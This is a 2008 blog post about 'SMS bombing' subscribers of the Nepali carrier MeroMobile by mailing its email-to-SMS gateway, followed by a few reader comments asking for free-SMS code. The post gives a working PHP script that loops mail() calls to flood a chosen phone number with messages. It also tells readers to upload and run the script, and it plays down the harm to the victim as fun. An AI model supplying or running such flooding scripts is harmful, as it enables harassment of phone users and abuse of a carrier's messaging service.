Written on November 04, 2008 at 02:11 pm by Sovit Tamrakar

SMS to MeroMobile (SMS Bombing)

Have you ever tried sending sms to meromobile (spicenepal) just sending a email to 977{mobileno}@sms.spicenepal.com (eg: 9779803076263@sms.spicenepal.com). Then use your mind like a devil. You can just use this service to bomb tons of sms to a number in a minute. Well, I do not want to encourage you to make a crime, but when you do it around to your friends, then this is going to be great fun. Well, I tried it with my frens and I know how much do it confuse one who is the victim and don’t have any more memory in the mobile to get the sms in his/her inbox and there are still many sms he has to delete after he does the previous ones.

Its very simple to do it. I have a script that can do it. Well, you wouldn’t not need a perfect knowledge of PHP or anything like that. save it as sms.php and change the values of some variables and you are ON.

$number="9803076263"; // or any number to bomb at like 980*******
$sendto = "977".$number."@sms.spicenepal.com"; // Don't change this
$mess = " You are getting bombed";   //message you want to send
$subjt = "some subject";  //Set the mail Subject
$howmany = 50;  // Get no of times to send.(Better put it less than 50 at a time)
$headers = 'From: sms@sender.com'; // Some headers add more if you want

// Start a loop to send sms the number of time determined before
for($i=0; $i < $howmany; $i++){
mail($sendto, $subjt, $mess, $headers);
} // End the loop

echo "SMS sent"; // Print user friendly message

Now, upload it to your webserver and execute it in your web browser.

Enjoy the SMS Bombing, but don’t use it to make a crime. I don’t want to take a credit.

I have developed another Script for sending SMS to MeroMobile without using mail() functions. Its effective needs the ICS-Weblogin detail for spicenepal.com that you get to send websms. Basically it uses cURL functions that is avaliable in PHP and you won’t need to add @sms.spicenepal.com at the end of recipent number and even use a mail() function… This script is great, but you might have not noticed but Meromobile’s Websms has the limit of 10 sms per day per user. So, You should be using it wisely.. More about this version here

5 Responses to “SMS to MeroMobile (SMS Bombing)”

subarna shrestha

December 18th, 2008 8:04 am

i wanna join to meromobile to free sms per day how to star it can u give me some ideas about it

best affiliate program

January 19th, 2009 7:59 pm

Your article is very interesting, i bookmarked your blog for future referrence :)

Nischal

May 20th, 2009 8:28 am

Can u please provide me the code to send free sms to mero mobile and NTC from http://

Thanks!

madhab

May 23rd, 2009 4:45 pm

i want send sms how?pls.

Nischal

May 24th, 2009 9:32 am

Leave a Reply